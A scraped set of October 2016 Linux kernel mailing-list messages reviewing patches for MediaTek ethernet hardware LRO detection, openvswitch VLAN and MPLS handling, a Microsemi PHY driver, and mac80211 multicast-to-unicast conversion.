On 10/05/2016 03:46 PM, Nelson Chang wrote:


+static bool mtk_is_hwlro_supported(struct mtk_eth *eth) {
+ if (eth->chip_id == MT7623_ETH)
+ return true;
+ else
+ return false;


return eth->chip_id == MT7623_ETH;

=> Since there will be more chips support hw lro in the future, keep the
original codes to have the scalability like this:
if (eth->chip_id == MT_ETH ||
eth->chip_id == MT_ETH ||
)
return true;


   Then use *switch*, not *if*.


Nelson


MBR, Sergei



Re: [PATCH net-next 1/2] openvswitch: remove nonreachable code in vlan parsing

2016-10-05 Thread Jiri Benc
On Tue, 4 Oct 2016 20:06:18 -0400, Eric Garver wrote:
> This code is also called for packets passed back down from userspace
> (after the flow key miss and upcall). So it does happen that we have a
> skb without skb->vlan_tci set.

That sucks. The vlan handling should be really consistent, Jiri Pirko
and others put great effort to unify it in the stack, we should make
use of that effort.

I'll respin this patchset and add a patch to make the vlan handling
consistent.

> See the chain:
> ovs_packet_cmd_execute()
>   ovs_flow_key_extract_userspace()
> key_extract()
>   parse_vlan()
> 
> > Moreover, the likely() statement around skb_vlan_tag_present is bogus. This
> > code is called whenever flow key is being extracted from the packet. The
> > packet may be as likely vlan tagged as not.
> 
> I guess the unlikely scenario is the one I mention above.

But it's wrong. It's also called via

ovs_vport_receive()
  ovs_flow_key_extract()
key_extract()
  parse_vlan()

and in that path, both cases (vlan vs. non-vlan) are equally possible.

 Jiri


Re: [PATCH net-next] openvswitch: correctly fragment packet with mpls headers

2016-10-05 Thread Jiri Benc
On Tue, 4 Oct 2016 19:03:46 -0700, Pravin Shelar wrote:
> We could have encapsulated packet defragmented in physical bridge.
> that mean the packet is entering OVS after egressing tunnel device.
> That use case would break due to this patch.

Okay, thanks for explanation. I missed this use case and it would
indeed break. And we can't clear existing inner headers when the frame
enters the bridge as it would break GSO.

Seems checking for the MPLS ethertype is indeed the only safe solution.

> > If this patch is wrong, then the current push_mpls is wrong, too, it
> > does the same assumption.
> >
> I am not sure what you mean, can you explain?

push_mpls() uses inner_proto as an indication whether this is the first
MPLS label or not. But it checks skb->encapsulation at the start, thus
it's safe (I expected this check to be done at the config time, not
runtime, and looked in the wrong place for it.)

I'll respin the patch.

Thanks for the patience with me,

 Jiri


RE: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread Nelson Chang
Hi Sergei,

Sorry, miss that.

> +static bool mtk_is_hwlro_supported(struct mtk_eth *eth) {
> + if (eth->chip_id == MT7623_ETH)
> + return true;
> + else
> + return false;

return eth->chip_id == MT7623_ETH;

=> Since there will be more chips support hw lro in the future, keep the
original codes to have the scalability like this:
if (eth->chip_id == MT_ETH ||
eth->chip_id == MT_ETH ||
)
return true;



Nelson

-Original Message-
From: Sergei Shtylyov [mailto:sergei.shtyl...@cogentembedded.com]
Sent: Wednesday, October 05, 2016 8:18 PM
To: Nelson Chang (張家祥); j...@phrozen.org; da...@davemloft.net
Cc: n...@openwrt.org; netdev@vger.kernel.org;
linux-media...@lists.infradead.org; nelsonch...@gmail.com
Subject: Re: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro
capability by the chip id instead of by the dtsi

Hello.

On 10/05/2016 03:12 PM, Nelson Chang wrote:

> Because hw lro started to be supported from MT7623, the proper way to
> check if the feature is capable is to judge by the chip id instead of
by the dtsi.
>
> Signed-off-by: Nelson Chang 
> ---
>  drivers/net/ethernet/mediatek/mtk_eth_soc.c | 12 ++--
> drivers/net/ethernet/mediatek/mtk_eth_soc.h |  1 +
>  2 files changed, 11 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
> b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
> index 0c67ab1..07f3ffa 100644
> --- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
> +++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
> @@ -2348,6 +2348,14 @@ static int mtk_get_chip_id(struct mtk_eth *eth,
u32 *chip_id)
>   return 0;
>  }
>
> +static bool mtk_is_hwlro_supported(struct mtk_eth *eth) {
> + if (eth->chip_id == MT7623_ETH)
> + return true;
> + else
> + return false;

return eth->chip_id == MT7623_ETH;

[...]
> diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
> b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
> index a5b422b..58738fd 100644
> --- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
> +++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
> @@ -345,6 +345,7 @@
>  /* ethernet subsystem chip id register */
>  #define ETHSYS_CHIPID0_3 0x0
>  #define ETHSYS_CHIPID4_7 0x4
> +#define MT7623_ETH   (7623)

() not needed at all.

MBR, Sergei



RE: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread Nelson Chang
Hi Sergei,

Thanks for your comments.
Modified.


Nelson

-Original Message-
From: Sergei Shtylyov [mailto:sergei.shtyl...@cogentembedded.com] 
Sent: Wednesday, October 05, 2016 8:18 PM
To: Nelson Chang (張家祥); j...@phrozen.org; da...@davemloft.net
Cc: n...@openwrt.org; netdev@vger.kernel.org;
linux-media...@lists.infradead.org; nelsonch...@gmail.com
Subject: Re: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro
capability by the chip id instead of by the dtsi

Hello.

On 10/05/2016 03:12 PM, Nelson Chang wrote:

> Because hw lro started to be supported from MT7623, the proper way to 
> check if the feature is capable is to judge by the chip id instead of
by the dtsi.
>
> Signed-off-by: Nelson Chang 
> ---
>  drivers/net/ethernet/mediatek/mtk_eth_soc.c | 12 ++--  
> drivers/net/ethernet/mediatek/mtk_eth_soc.h |  1 +
>  2 files changed, 11 insertions(+), 2 deletions(-)
>
> diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c 
> b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
> index 0c67ab1..07f3ffa 100644
> --- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
> +++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
> @@ -2348,6 +2348,14 @@ static int mtk_get_chip_id(struct mtk_eth *eth,
u32 *chip_id)
>   return 0;
>  }
>
> +static bool mtk_is_hwlro_supported(struct mtk_eth *eth) {
> + if (eth->chip_id == MT7623_ETH)
> + return true;
> + else
> + return false;

return eth->chip_id == MT7623_ETH;

[...]
> diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h 
> b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
> index a5b422b..58738fd 100644
> --- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
> +++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
> @@ -345,6 +345,7 @@
>  /* ethernet subsystem chip id register */
>  #define ETHSYS_CHIPID0_3 0x0
>  #define ETHSYS_CHIPID4_7 0x4
> +#define MT7623_ETH   (7623)

() not needed at all.

MBR, Sergei





[PATCH net-next v2 RESEND 1/3] net: ethernet: mediatek: get the chip id by ETHDMASYS registers

2016-10-05 Thread Nelson Chang
The driver gets the chip id by ETHSYS_CHIPID0_3/ETHSYS_CHIPID4_7 registers
in mtk_probe().

Signed-off-by: Nelson Chang 
---
 drivers/net/ethernet/mediatek/mtk_eth_soc.c | 29 +
 drivers/net/ethernet/mediatek/mtk_eth_soc.h |  5 +
 2 files changed, 34 insertions(+)

diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
index ad4ab97..0c67ab1 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
@@ -2323,6 +2323,31 @@ free_netdev:
return err;
 }
 
+static int mtk_get_chip_id(struct mtk_eth *eth, u32 *chip_id)
+{
+   u32 val[2], id[4];
+
+   regmap_read(eth->ethsys, ETHSYS_CHIPID0_3, &val[0]);
+   regmap_read(eth->ethsys, ETHSYS_CHIPID4_7, &val[1]);
+
+   id[3] = ((val[0] >> 16) & 0xff) - '0';
+   id[2] = ((val[0] >> 24) & 0xff) - '0';
+   id[1] = (val[1] & 0xff) - '0';
+   id[0] = ((val[1] >> 8) & 0xff) - '0';
+
+   *chip_id = (id[3] * 1000) + (id[2] * 100) +
+  (id[1] * 10) + id[0];
+
+   if (!(*chip_id)) {
+   dev_err(eth->dev, "failed to get chip id\n");
+   return -ENODEV;
+   }
+
+   dev_info(eth->dev, "chip id = %d\n", *chip_id);
+
+   return 0;
+}
+
 static int mtk_probe(struct platform_device *pdev)
 {
struct resource *res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
@@ -2388,6 +2413,10 @@ static int mtk_probe(struct platform_device *pdev)
if (err)
return err;
 
+   err = mtk_get_chip_id(eth, ð->chip_id);
+   if (err)
+   return err;
+
for_each_child_of_node(pdev->dev.of_node, mac_np) {
if (!of_device_is_compatible(mac_np,
 "mediatek,eth-mac"))
diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
index 3003195..a5b422b 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
@@ -342,6 +342,10 @@
 #define GPIO_BIAS_CTRL 0xed0
 #define GPIO_DRV_SEL10 0xf00
 
+/* ethernet subsystem chip id register */
+#define ETHSYS_CHIPID0_3   0x0
+#define ETHSYS_CHIPID4_7   0x4
+
 /* ethernet subsystem config register */
 #define ETHSYS_SYSCFG0 0x14
 #define SYSCFG0_GE_MASK0x3
@@ -534,6 +538,7 @@ struct mtk_eth {
unsigned long   sysclk;
struct regmap   *ethsys;
struct regmap   *pctl;
+   u32 chip_id;
boolhwlro;
atomic_tdma_refcnt;
struct mtk_tx_ring  tx_ring;
-- 
1.9.1



[PATCH net-next v2 RESEND 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread Nelson Chang
Because hw lro started to be supported from MT7623, the proper way to check if
the feature is capable is to judge by the chip id instead of by the dtsi.

Signed-off-by: Nelson Chang 
---
 drivers/net/ethernet/mediatek/mtk_eth_soc.c | 12 ++--
 drivers/net/ethernet/mediatek/mtk_eth_soc.h |  1 +
 2 files changed, 11 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
index 0c67ab1..07f3ffa 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
@@ -2348,6 +2348,14 @@ static int mtk_get_chip_id(struct mtk_eth *eth, u32 
*chip_id)
return 0;
 }
 
+static bool mtk_is_hwlro_supported(struct mtk_eth *eth)
+{
+   if (eth->chip_id == MT7623_ETH)
+   return true;
+   else
+   return false;
+}
+
 static int mtk_probe(struct platform_device *pdev)
 {
struct resource *res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
@@ -2387,8 +2395,6 @@ static int mtk_probe(struct platform_device *pdev)
return PTR_ERR(eth->pctl);
}
 
-   eth->hwlro = of_property_read_bool(pdev->dev.of_node, "mediatek,hwlro");
-
for (i = 0; i < 3; i++) {
eth->irq[i] = platform_get_irq(pdev, i);
if (eth->irq[i] < 0) {
@@ -2417,6 +2423,8 @@ static int mtk_probe(struct platform_device *pdev)
if (err)
return err;
 
+   eth->hwlro = mtk_is_hwlro_supported(eth);
+
for_each_child_of_node(pdev->dev.of_node, mac_np) {
if (!of_device_is_compatible(mac_np,
 "mediatek,eth-mac"))
diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
index a5b422b..99b1c8e 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
@@ -345,6 +345,7 @@
 /* ethernet subsystem chip id register */
 #define ETHSYS_CHIPID0_3   0x0
 #define ETHSYS_CHIPID4_7   0x4
+#define MT7623_ETH 7623
 
 /* ethernet subsystem config register */
 #define ETHSYS_SYSCFG0 0x14
-- 
1.9.1



[PATCH net-next v2 RESEND 0/3] net: ethernet: mediatek: check the hw lro capability by the chip id instead of the dtsi

2016-10-05 Thread Nelson Chang
The series modify to check if hw lro is supported by the chip id.

changes since v2:
- Refine mtk_get_chip_id() function

changes since v1:
- Because hw lro started to be supported from MT7623, the proper way to check 
if the feature is capable is to judge by the chip id instead of by the dtsi.

Nelson Chang (3):
  net: ethernet: mediatek: get the chip id by ETHDMASYS registers
  net: ethernet: mediatek: get hw lro capability by the chip id instead
of by the dtsi
  net: ethernet: mediatek: remove hwlro property in the device tree

 .../devicetree/bindings/net/mediatek-net.txt   |  2 --
 drivers/net/ethernet/mediatek/mtk_eth_soc.c| 41 --
 drivers/net/ethernet/mediatek/mtk_eth_soc.h|  6 
 3 files changed, 45 insertions(+), 4 deletions(-)

-- 
1.9.1



[PATCH net-next v2 RESEND 3/3] net: ethernet: mediatek: remove hwlro property in the device tree

2016-10-05 Thread Nelson Chang
Since the proper way to check the hw lro capability is by the chip id,
hwlro property in the device tree should be removed.

Signed-off-by: Nelson Chang 
---
 Documentation/devicetree/bindings/net/mediatek-net.txt | 2 --
 1 file changed, 2 deletions(-)

diff --git a/Documentation/devicetree/bindings/net/mediatek-net.txt 
b/Documentation/devicetree/bindings/net/mediatek-net.txt
index f095257..c010faf 100644
--- a/Documentation/devicetree/bindings/net/mediatek-net.txt
+++ b/Documentation/devicetree/bindings/net/mediatek-net.txt
@@ -24,7 +24,6 @@ Required properties:
 Optional properties:
 - interrupt-parent: Should be the phandle for the interrupt controller
   that services interrupts for this device
-- mediatek,hwlro: the capability if the hardware supports LRO functions
 
 * Ethernet MAC node
 
@@ -54,7 +53,6 @@ eth: ethernet@1b10 {
reset-names = "eth";
mediatek,ethsys = <ðsys>;
mediatek,pctl = <&syscfg_pctl_a>;
-   mediatek,hwlro;
#address-cells = <1>;
#size-cells = <0>;
 
-- 
1.9.1



Re: [PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread Sergei Shtylyov

Hello.

On 10/05/2016 03:12 PM, Nelson Chang wrote:


Because hw lro started to be supported from MT7623, the proper way to check if
the feature is capable is to judge by the chip id instead of by the dtsi.

Signed-off-by: Nelson Chang 
---
 drivers/net/ethernet/mediatek/mtk_eth_soc.c | 12 ++--
 drivers/net/ethernet/mediatek/mtk_eth_soc.h |  1 +
 2 files changed, 11 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
index 0c67ab1..07f3ffa 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
@@ -2348,6 +2348,14 @@ static int mtk_get_chip_id(struct mtk_eth *eth, u32 
*chip_id)
return 0;
 }

+static bool mtk_is_hwlro_supported(struct mtk_eth *eth)
+{
+   if (eth->chip_id == MT7623_ETH)
+   return true;
+   else
+   return false;


return eth->chip_id == MT7623_ETH;

[...]

diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
index a5b422b..58738fd 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
@@ -345,6 +345,7 @@
 /* ethernet subsystem chip id register */
 #define ETHSYS_CHIPID0_3   0x0
 #define ETHSYS_CHIPID4_7   0x4
+#define MT7623_ETH (7623)


   () not needed at all.

MBR, Sergei



[PATCH net-next v2 0/3] net: ethernet: mediatek: check the hw lro capability by the chip id instead of the dtsi

2016-10-05 Thread Nelson Chang
The series modify to check if hw lro is supported by the chip id.

changes since v2:
- Refine mtk_get_chip_id() function

changes since v1:
- Because hw lro started to be supported from MT7623, the proper way to check 
if the feature is capable is to judge by the chip id instead of by the dtsi.

Nelson Chang (3):
  net: ethernet: mediatek: get the chip id by ETHDMASYS registers
  net: ethernet: mediatek: get hw lro capability by the chip id instead
of by the dtsi
  net: ethernet: mediatek: remove hwlro property in the device tree

 .../devicetree/bindings/net/mediatek-net.txt   |  2 --
 drivers/net/ethernet/mediatek/mtk_eth_soc.c| 39 --
 drivers/net/ethernet/mediatek/mtk_eth_soc.h|  6 
 3 files changed, 43 insertions(+), 4 deletions(-)

-- 
1.9.1



[PATCH net-next v2 3/3] net: ethernet: mediatek: remove hwlro property in the device tree

2016-10-05 Thread Nelson Chang
Since the proper way to check the hw lro capability is by the chip id,
hwlro property in the device tree should be removed.

Signed-off-by: Nelson Chang 
---
 Documentation/devicetree/bindings/net/mediatek-net.txt | 2 --
 1 file changed, 2 deletions(-)

diff --git a/Documentation/devicetree/bindings/net/mediatek-net.txt 
b/Documentation/devicetree/bindings/net/mediatek-net.txt
index f095257..c010faf 100644
--- a/Documentation/devicetree/bindings/net/mediatek-net.txt
+++ b/Documentation/devicetree/bindings/net/mediatek-net.txt
@@ -24,7 +24,6 @@ Required properties:
 Optional properties:
 - interrupt-parent: Should be the phandle for the interrupt controller
   that services interrupts for this device
-- mediatek,hwlro: the capability if the hardware supports LRO functions
 
 * Ethernet MAC node
 
@@ -54,7 +53,6 @@ eth: ethernet@1b10 {
reset-names = "eth";
mediatek,ethsys = <ðsys>;
mediatek,pctl = <&syscfg_pctl_a>;
-   mediatek,hwlro;
#address-cells = <1>;
#size-cells = <0>;
 
-- 
1.9.1



[PATCH net-next v2 1/3] net: ethernet: mediatek: get the chip id by ETHDMASYS registers

2016-10-05 Thread Nelson Chang
The driver gets the chip id by ETHSYS_CHIPID0_3/ETHSYS_CHIPID4_7 registers
in mtk_probe().

Signed-off-by: Nelson Chang 
---
 drivers/net/ethernet/mediatek/mtk_eth_soc.c | 29 +
 drivers/net/ethernet/mediatek/mtk_eth_soc.h |  5 +
 2 files changed, 34 insertions(+)

diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
index ad4ab97..0c67ab1 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
@@ -2323,6 +2323,31 @@ free_netdev:
return err;
 }
 
+static int mtk_get_chip_id(struct mtk_eth *eth, u32 *chip_id)
+{
+   u32 val[2], id[4];
+
+   regmap_read(eth->ethsys, ETHSYS_CHIPID0_3, &val[0]);
+   regmap_read(eth->ethsys, ETHSYS_CHIPID4_7, &val[1]);
+
+   id[3] = ((val[0] >> 16) & 0xff) - '0';
+   id[2] = ((val[0] >> 24) & 0xff) - '0';
+   id[1] = (val[1] & 0xff) - '0';
+   id[0] = ((val[1] >> 8) & 0xff) - '0';
+
+   *chip_id = (id[3] * 1000) + (id[2] * 100) +
+  (id[1] * 10) + id[0];
+
+   if (!(*chip_id)) {
+   dev_err(eth->dev, "failed to get chip id\n");
+   return -ENODEV;
+   }
+
+   dev_info(eth->dev, "chip id = %d\n", *chip_id);
+
+   return 0;
+}
+
 static int mtk_probe(struct platform_device *pdev)
 {
struct resource *res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
@@ -2388,6 +2413,10 @@ static int mtk_probe(struct platform_device *pdev)
if (err)
return err;
 
+   err = mtk_get_chip_id(eth, ð->chip_id);
+   if (err)
+   return err;
+
for_each_child_of_node(pdev->dev.of_node, mac_np) {
if (!of_device_is_compatible(mac_np,
 "mediatek,eth-mac"))
diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
index 3003195..a5b422b 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
@@ -342,6 +342,10 @@
 #define GPIO_BIAS_CTRL 0xed0
 #define GPIO_DRV_SEL10 0xf00
 
+/* ethernet subsystem chip id register */
+#define ETHSYS_CHIPID0_3   0x0
+#define ETHSYS_CHIPID4_7   0x4
+
 /* ethernet subsystem config register */
 #define ETHSYS_SYSCFG0 0x14
 #define SYSCFG0_GE_MASK0x3
@@ -534,6 +538,7 @@ struct mtk_eth {
unsigned long   sysclk;
struct regmap   *ethsys;
struct regmap   *pctl;
+   u32 chip_id;
boolhwlro;
atomic_tdma_refcnt;
struct mtk_tx_ring  tx_ring;
-- 
1.9.1



[PATCH net-next v2 2/3] net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi

2016-10-05 Thread Nelson Chang
Because hw lro started to be supported from MT7623, the proper way to check if
the feature is capable is to judge by the chip id instead of by the dtsi.

Signed-off-by: Nelson Chang 
---
 drivers/net/ethernet/mediatek/mtk_eth_soc.c | 12 ++--
 drivers/net/ethernet/mediatek/mtk_eth_soc.h |  1 +
 2 files changed, 11 insertions(+), 2 deletions(-)

diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
index 0c67ab1..07f3ffa 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
@@ -2348,6 +2348,14 @@ static int mtk_get_chip_id(struct mtk_eth *eth, u32 
*chip_id)
return 0;
 }
 
+static bool mtk_is_hwlro_supported(struct mtk_eth *eth)
+{
+   if (eth->chip_id == MT7623_ETH)
+   return true;
+   else
+   return false;
+}
+
 static int mtk_probe(struct platform_device *pdev)
 {
struct resource *res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
@@ -2387,8 +2395,6 @@ static int mtk_probe(struct platform_device *pdev)
return PTR_ERR(eth->pctl);
}
 
-   eth->hwlro = of_property_read_bool(pdev->dev.of_node, "mediatek,hwlro");
-
for (i = 0; i < 3; i++) {
eth->irq[i] = platform_get_irq(pdev, i);
if (eth->irq[i] < 0) {
@@ -2417,6 +2423,8 @@ static int mtk_probe(struct platform_device *pdev)
if (err)
return err;
 
+   eth->hwlro = mtk_is_hwlro_supported(eth);
+
for_each_child_of_node(pdev->dev.of_node, mac_np) {
if (!of_device_is_compatible(mac_np,
 "mediatek,eth-mac"))
diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h 
b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
index a5b422b..58738fd 100644
--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
@@ -345,6 +345,7 @@
 /* ethernet subsystem chip id register */
 #define ETHSYS_CHIPID0_3   0x0
 #define ETHSYS_CHIPID4_7   0x4
+#define MT7623_ETH (7623)
 
 /* ethernet subsystem config register */
 #define ETHSYS_SYSCFG0 0x14
-- 
1.9.1



Re: [PATCH v8 net-next] net: phy: Add Edge-rate driver for Microsemi PHYs.

2016-10-05 Thread Andrew Lunn
> - As per review comment, Added DT vddmac, slowdown value error check. 

So i said an exact match, which this is not.

How about something like:

static u8 vsc85xx_edge_rate_magic_get(u16 vddmac, u8 slowdown)
{
u8 vdd;
u8 sd;

for (vdd = 0; vdd < ARRAY_SIZE(edge_table); vdd++)
if (edge_table[vdd].vddmac == vddmac)
for (sd = 0; sd < MSCC_SLOWDOWN_MAX; sd++)
if (edge_table[vdd].slowdown[sd] == slowdown)
return (MSCC_SLOWDOWN_MAX - sd - 1);
return -EINVAL;
}

> @@ -197,15 +203,34 @@ static int vsc8531_of_init(struct phy_device *phydev)
  
rc = of_property_read_u16(of_node, "vsc8531,vddmac",
  &vsc8531->vddmac);
if (rc == -EINVAL)
vddmac = MSCC_VDDMAC_3300;

rc = of_property_read_u8(of_node, "vsc8531,edge-slowdown",
 &vsc8531->edge_slowdown);
if (rc == -EINVAL)
edge_slowdown = 0;

vsc8531->rate_magic = edge_rate_magic_get(vddmac, edge_slowdown);
if (vsc8531->rate_magic < 0) {
   dev_err(phydev->dev, "Invalid vsc8531,vddmac or 
vsc8531,edge-slowdown");
   return vsc8531->rate_magic;
}

>  static int vsc8531_of_init(struct phy_device *phydev)
> @@ -232,8 +257,8 @@ static int vsc85xx_config_init(struct phy_device *phydev)
>   if (rc)
>   return rc;
>  
>   rc = vsc85xx_edge_rate_cntl_set(phydev, vsc8531->rate_magic);
>   if (rc)
>   return rc;

Andrew


Re: [PATCH 3/3] mac80211: multicast to unicast conversion

2016-10-05 Thread Johannes Berg
On Wed, 2016-10-05 at 13:40 +0200, michael-dev wrote:
> Am 05.10.2016 12:19, schrieb Johannes Berg:
> > 
> > > 
> > > on both ends. Furthermore, I've seen a few mobile phone stations
> > > locally that indicate qos support but won't complete DHCP if
> > > their broadcasts are encapsulated as A-MSDU. Though they work
> > > fine with this series approach.
> > 
> > Presumably those phones also don't even try to use DMS, right?
> 
> When I traced this two years ago, almost no device indicated DMS 
> support, even though almost all seem to accepted multicast in unicast
> a-msdu frames.

Right, that's what I suspected. I'm a bit surprised they accepted
multicast in unicast A-MSDU too, though I don't actually see any big
problem with it.

> > How did you determine that it "works fine"?
> 
> First, I tested this manually using my own devices or asked friends. 
[snip

Thanks!

> > I see at least one undesirable impact of this, which DMS doesn't
> > have; it breaks a client's MUST NOT requirement from RFC 1122:
> 
> Okay, so this cannot go into linux, right?

I'm not necessarily saying that, I just think we need to be careful
documenting possibly unexpected/undesired side-effects.

> > > + * @set_ap_unicast: set the multicast to unicast flag for a AP
> > > interface
> > 
> > That API name isn't very descriptive, I'm sure we can do something
> > better there.
> 
> proposal: "request multicast packets to be trasnmitted as unicast" ?

I was thinking more of the function name ("set_ap_unicast") which by
itself makes no sense - set_multicast_to_unicast or something like that
would be better, no?

> > Also, perhaps we should structure this already like we would DMS,
> > with a per-station toggle or even list of multicast addresses?
> 
> should be possible, yes

I'm mostly handwaving though, haven't really looked at what DMS really
would require from the API, even assuming that hostapd would implement
all the action frame handling etc.

It's quite possible that on the *client* side, mac80211 should
implement the DMS client, if supported, and perhaps only if enabled by
some kind of configuration knob.

> > Was this not documented but also intended to apply to its dependent
> > VLANs?
> 
> it was intended as a per per-BSS toggle, so it applies to all
> dependent VLANs automatically.

makes sense, but you should document it in the API documentation, which
today says "for a AP interface" or so (see above)

(btw - writing that out I see that it should be "an AP interface" too)

> > 
> > > 
> > > +/* Check if multicast to unicast conversion is needed and do it.
> > > + * Returns 1 if skb was freed and should not be send out. */
> > 
> > wrong comment style :)
> 
> you mean the */ at end of line instead of on a new line?

yeah, no big deal though.

I've also mostly gone back to non-davem style with /* also on its own
line, but it's not so important. :)

> > > + unicast = nla_data(info->attrs[NL80211_ATTR_UNICAST]);
> > 
> > What's this supposed to mean?
> 
> this was supposed to be nla_get_u8.

Shouldn't it just be nla_get_flag()? I mean, why do you have a u8 with
values 0/1 rather than just flag attribute absent/present?

Anyway, perhaps this needs to change to take DMS/per-station into
account?

Then again, this kind of setting - global multicast-to-unicast -
fundamentally *cannot* be done on a per-station basis, since if you
enable it for one station and not for another, the first station that
has it enabled would get the packets twice...

johannes


Re: [PATCH 3/3] mac80211: multicast to unicast conversion

2016-10-05 Thread michael-dev

Am 05.10.2016 12:19, schrieb Johannes Berg:

on both ends. Furthermore, I've seen a few mobile phone stations
locally that indicate qos support but won't complete DHCP if their
broadcasts are encapsulated as A-MSDU. Though they work fine with
this series approach.


Presumably those phones also don't even try to use DMS, right?


When I traced this two years ago, almost no device indicated DMS 
support, even though almost all seem to accepted multicast in unicast 
a-msdu frames.





This patch therefore does not opt to implement DMS but instead just
replicates the packet and changes the destination address. As this
works fine with ARP, IPv4 and IPv6, it is limited to these protocols
and normal 802.11 multicast frames are send out for all other payload
protocols.


How did you determine that it "works fine"?


First, I tested this manually using my own devices or asked friends. I 
think this covered at least a recent debian x64 with an intel wireless 
card, a windows 7 x64 with an intel wireless card, an android phone, an 
ios phone and some recent macbook. Manually testing included visiting an 
IPv6 only website (this network uses IPv6 router advertismentens (RA) 
but no DHCPv6), so RA is accepted and ND working. Additionally, 
arping'ing these station using broadcast arp request worked fine, so 
broadcast arp requests are working. Finally, DHCP worked fine and UPNP 
multicast discovery for some closed source media streaming wireless 
device was reported working.


Next, that change was rolled out. It is now in use for at least three 
years with about 300 simulatenously online stations and >2000 currently 
registered devices and there hasn't been a single problem report that 
could be related to that change. Though, e.g. our samsung galaxy users 
report consistently that their devices refuse to connect using WPA-PSK 
as our network advertises FT-PSK next to WPA-PSK and I learned that 
there was at least one device there that did not like the 
multicast-as-unicast-amsdu packets due to a user problem report.



I see at least one undesirable impact of this, which DMS doesn't have;
it breaks a client's MUST NOT requirement from RFC 1122:


Okay, so this cannot go into linux, right?

The thing I dislike most about DMS is that it is client driven, that is 
an AP will only apply unicast conversion if a station actively requests 
so.



You should split the patch into cfg80211 and mac80211, IMHO it's big
enough to do that.


ok


+ * @set_ap_unicast: set the multicast to unicast flag for a AP
interface


That API name isn't very descriptive, I'm sure we can do something
better there.


proposal: "request multicast packets to be trasnmitted as unicast" ?


Also, perhaps we should structure this already like we would DMS, with
a per-station toggle or even list of multicast addresses?


should be possible, yes



+static int ieee80211_set_ap_unicast(struct wiphy *wiphy, struct
net_device *dev,
+   const bool unicast)
+{
+   struct ieee80211_sub_if_data *sdata =
IEEE80211_DEV_TO_SUB_IF(dev);
+
+   if (sdata->vif.type != NL80211_IFTYPE_AP)
+   return -1;


Was this not documented but also intended to apply to its dependent
VLANs?


it was intended as a per per-BSS toggle, so it applies to all dependent 
VLANs automatically.



+/* Check if multicast to unicast conversion is needed and do it.
+ * Returns 1 if skb was freed and should not be send out. */


wrong comment style :)


you mean the */ at end of line instead of on a new line?


